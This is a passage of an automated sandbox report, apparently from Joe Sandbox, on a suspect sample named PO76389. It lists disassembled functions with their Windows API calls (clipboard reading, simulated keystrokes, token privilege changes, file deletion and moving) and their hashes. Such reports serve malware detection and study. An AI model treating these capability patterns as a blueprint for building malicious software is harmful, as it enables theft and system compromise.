                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                    • String ID:
                                                    • API String ID: 1144279405-0
                                                    • Opcode ID: f1a148077adf7bf0b8ea669e44160400ece2551e31d482cdc7f9746e78b0c477
                                                    • Instruction ID: 3b4364eab8d493f529c13791309e847e88b0e4a359a00935a031e142bf18cdd7
                                                    • Opcode Fuzzy Hash: f1a148077adf7bf0b8ea669e44160400ece2551e31d482cdc7f9746e78b0c477
                                                    • Instruction Fuzzy Hash: 9411B232804614DFD7117F66D8623693662AF42339F56064BF5640F3E2DBBC4940ABAA
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 004D377D
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 285c1df8d0bf76dea6f827c48717cc8020eff6ea049a4a074e3ffd079d3a73c4
                                                    • Instruction ID: 4fcba929e44e5d36b4192c1645120ce9758772c9c60f31904e63f8c2619b13bf
                                                    • Opcode Fuzzy Hash: 285c1df8d0bf76dea6f827c48717cc8020eff6ea049a4a074e3ffd079d3a73c4
                                                    • Instruction Fuzzy Hash: CBF0C2B1500615AADF21AF758C1639F7660BF00315F40851BB4109A391E77C8B40DB8A
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,004B34E2,?,00000001), ref: 004B3E6D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 96306d7c2d3485bad7bceec25985f3030f5f63a9480ba26b5fffb8c86992ecd0
                                                    • Instruction ID: c94819905b692bea3f8df4d05bf5a2f75aa9d13b5fd2fad4247fb807e240827b
                                                    • Opcode Fuzzy Hash: 96306d7c2d3485bad7bceec25985f3030f5f63a9480ba26b5fffb8c86992ecd0
                                                    • Instruction Fuzzy Hash: 53F03971101741CFCB349F66D490997BBF0AF1471A3258A7FE5D682621C739D948DF24
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: d737acbc70da5eadef2b7d2cb617a21c535a8ef2b4ee69cd1fc28c820be5115a
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 90B0927244030C77CE012A82EC06A493B19AB90764F008022FB0C18261A677AAA09A89
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: b04b2b78bf6d0d3cc46ef008c3582b4731716c5d79bfca7ffba70bed543459ea
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: BCE0BF7494020DEFDB00DFA8D5496DD7BB4EF05301F1005A1FD05D7680DB309E54CA66
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: c746a6470f0be7562711ab958e8b96f584202c2207b59d215ec58597a42939a7
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 02E0BF7494020D9FDB00DFA8D54969D7BB4EF04301F100161FD01D2280D63099508A62
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0051F64E
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F6AD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051F6EA
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F711
                                                    • SendMessageW.USER32 ref: 0051F737
                                                    • _wcsncpy.LIBCMT ref: 0051F7A3
                                                    • GetKeyState.USER32(00000011), ref: 0051F7C4
                                                    • GetKeyState.USER32(00000009), ref: 0051F7D1
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F7E7
                                                    • GetKeyState.USER32(00000010), ref: 0051F7F1
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F820
                                                    • SendMessageW.USER32 ref: 0051F843
                                                    • SendMessageW.USER32(?,00001030,?,0051DE69), ref: 0051F940
                                                    • SetCapture.USER32(?), ref: 0051F970
                                                    • ClientToScreen.USER32(?,?), ref: 0051F9D4
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0051F9FA
                                                    • ReleaseCapture.USER32 ref: 0051FA05
                                                    • GetCursorPos.USER32(?), ref: 0051FA3A
                                                    • ScreenToClient.USER32(?,?), ref: 0051FA47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FAA9
                                                    • SendMessageW.USER32 ref: 0051FAD3
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FB12
                                                    • SendMessageW.USER32 ref: 0051FB3D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0051FB55
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0051FB60
                                                    • GetCursorPos.USER32(?), ref: 0051FB81
                                                    • ScreenToClient.USER32(?,?), ref: 0051FB8E
                                                    • GetParent.USER32(?), ref: 0051FBAA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FC10
                                                    • SendMessageW.USER32 ref: 0051FC40
                                                    • ClientToScreen.USER32(?,?), ref: 0051FC96
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0051FCC2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FCEA
                                                    • SendMessageW.USER32 ref: 0051FD0D
                                                    • ClientToScreen.USER32(?,?), ref: 0051FD57
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0051FD87
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051FE1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3461372671-4164748364
                                                    • Opcode ID: 76afc723ad557376dacc7777b58da65aae7dc2e27cef33ad464681743e44dd71
                                                    • Instruction ID: 81b9797078338b633a23fbbfba418ff6e6dfd74eed8dfa0b78f905f76eda2303
                                                    • Opcode Fuzzy Hash: 76afc723ad557376dacc7777b58da65aae7dc2e27cef33ad464681743e44dd71
                                                    • Instruction Fuzzy Hash: 44328C71204201AFE710DF68D884AAABFF9FF48358F140A29F6A6872B1D731DC95DB51
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0051AFDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 23e0a7e7d1d9cae485d990a25b14272dee97c12db72a6a3e8cc101eacdf69c9b
                                                    • Instruction ID: 060c2d181d76e01ecceae61ec3f5d21db80eebe5b011bc33a9dbe3dd1c528915
                                                    • Opcode Fuzzy Hash: 23e0a7e7d1d9cae485d990a25b14272dee97c12db72a6a3e8cc101eacdf69c9b
                                                    • Instruction Fuzzy Hash: 8012DEB1601204ABEB268F65DC49FEE7FB8FF45310F10421AF51ADB291DB748985DB22
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 004CF796
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00524388
                                                    • IsIconic.USER32(000000FF), ref: 00524391
                                                    • ShowWindow.USER32(000000FF,00000009), ref: 0052439E
                                                    • SetForegroundWindow.USER32(000000FF), ref: 005243A8
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005243BE
                                                    • GetCurrentThreadId.KERNEL32 ref: 005243C5
                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 005243D1
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243E2
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243EA
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 005243F2
                                                    • SetForegroundWindow.USER32(000000FF), ref: 005243F5
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052440A
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524415
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052441F
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524424
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052442D
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524432
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052443C
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524441
                                                    • SetForegroundWindow.USER32(000000FF), ref: 00524444
                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0052446B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
                                                    • Instruction ID: 90a3bc080149fcfa8d2f5bf21ca07965a32df0141aefbfb2cd5f837378a24301
                                                    • Opcode Fuzzy Hash: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
                                                    • Instruction Fuzzy Hash: 5E315E71A40228BBEB216B71AC4AF7F7E7CEF55B50F104025FA05AA2D0C6B05951AEB0
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                      • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BBC
                                                      • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BCF
                                                      • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                    • _wcscat.LIBCMT ref: 004F6B9D
                                                    • _wcscat.LIBCMT ref: 004F6BBB
                                                    • __wsplitpath.LIBCMT ref: 004F6BE2
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004F6BF8
                                                    • _wcscpy.LIBCMT ref: 004F6C57
                                                    • _wcscat.LIBCMT ref: 004F6C6A
                                                    • _wcscat.LIBCMT ref: 004F6C7D
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 004F6CAB
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6CBC
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6CDB
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6CEA
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 004F6CFF
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6D10
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6D37
                                                    • FindClose.KERNEL32(00000000), ref: 004F6D53
                                                    • FindClose.KERNEL32(00000000), ref: 004F6D61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1867810238-1173974218
                                                    • Opcode ID: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                    • Instruction ID: 1b8e02fdcff1d17a2417751874dd4c9522fcef4e25e570b63460ab4c69dc3abb
                                                    • Opcode Fuzzy Hash: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                    • Instruction Fuzzy Hash: CA515F7290015CAADB21DBA0DC54EEE77BCAF19304F0445DBE649E3201DB389B88CF65
                                                    APIs
                                                    • OpenClipboard.USER32(0054DBF0), ref: 005070C3
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 005070D1
                                                    • GetClipboardData.USER32(0000000D), ref: 005070D9
                                                    • CloseClipboard.USER32 ref: 005070E5
                                                    • GlobalLock.KERNEL32(00000000), ref: 00507101
                                                    • CloseClipboard.USER32 ref: 0050710B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00507120
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0050712D
                                                    • GetClipboardData.USER32(00000001), ref: 00507135
                                                    • GlobalLock.KERNEL32(00000000), ref: 00507142
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00507176
                                                    • CloseClipboard.USER32 ref: 00507283
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 6924c3007ff3281dffeea46ba483468e62aecd3821fedf27d883f31ead9cbda9
                                                    • Instruction ID: 90af03d67c4a09e25e702cc7c5e4e49da1960232d57ab960b3fc6c8ff207182b
                                                    • Opcode Fuzzy Hash: 6924c3007ff3281dffeea46ba483468e62aecd3821fedf27d883f31ead9cbda9
                                                    • Instruction Fuzzy Hash: F251D6752082096BD300EF25DC86F6F7BB8BB98B00F00051EF556D62D1DB64E809DA72
                                                    APIs
                                                      • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                      • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                      • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                    • _memset.LIBCMT ref: 004EBA34
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004EBA86
                                                    • CloseHandle.KERNEL32(?), ref: 004EBA97
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004EBAAE
                                                    • GetProcessWindowStation.USER32 ref: 004EBAC7
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004EBAD1
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004EBAEB
                                                      • Part of subcall function 004EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                      • Part of subcall function 004EB8B0: CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 2d5da6baf75d9c2ab55ee61fb0d4f3c50442491e58a578f2d0532828b7bce4ae
                                                    • Instruction ID: b1c88bd1c8a0bf1f2e91222c930b5faa19850e6bb42c80d0a775150da1186839
                                                    • Opcode Fuzzy Hash: 2d5da6baf75d9c2ab55ee61fb0d4f3c50442491e58a578f2d0532828b7bce4ae
                                                    • Instruction Fuzzy Hash: FA818071800249AFDF11DFA6DD45AEF7BB8FF08305F14416AF914A6260DB398E14EBA4
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FFE03
                                                    • FindClose.KERNEL32(00000000), ref: 004FFE57
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE7C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE93
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FFEBA
                                                    • __swprintf.LIBCMT ref: 004FFF06
                                                    • __swprintf.LIBCMT ref: 004FFF3F
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • __swprintf.LIBCMT ref: 004FFF93
                                                      • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                    • __swprintf.LIBCMT ref: 004FFFE1
                                                    • __swprintf.LIBCMT ref: 00500030
                                                    • __swprintf.LIBCMT ref: 0050007F
                                                    • __swprintf.LIBCMT ref: 005000CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 108614129-2428617273
                                                    • Opcode ID: 73d22b3b78e28933b67ed273f47a5f5174c0399f8780aef40b7163948e52a9f5
                                                    • Instruction ID: 5ac51f21c32e05749123af6e24034ec66a991843ec85fb5871bfe5e022b72403
                                                    • Opcode Fuzzy Hash: 73d22b3b78e28933b67ed273f47a5f5174c0399f8780aef40b7163948e52a9f5
                                                    • Instruction Fuzzy Hash: 16A11071408344ABC350EFA5C895EAFB7EDBF98704F44091EF585C2191EB78DA09CB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00502065
                                                    • _wcscmp.LIBCMT ref: 0050207A
                                                    • _wcscmp.LIBCMT ref: 00502091
                                                    • GetFileAttributesW.KERNEL32(?), ref: 005020A3
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 005020BD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 005020D5
                                                    • FindClose.KERNEL32(00000000), ref: 005020E0
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 005020FC
                                                    • _wcscmp.LIBCMT ref: 00502123
                                                    • _wcscmp.LIBCMT ref: 0050213A
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0050214C
                                                    • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 0050216A
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00502174
                                                    • FindClose.KERNEL32(00000000), ref: 00502181
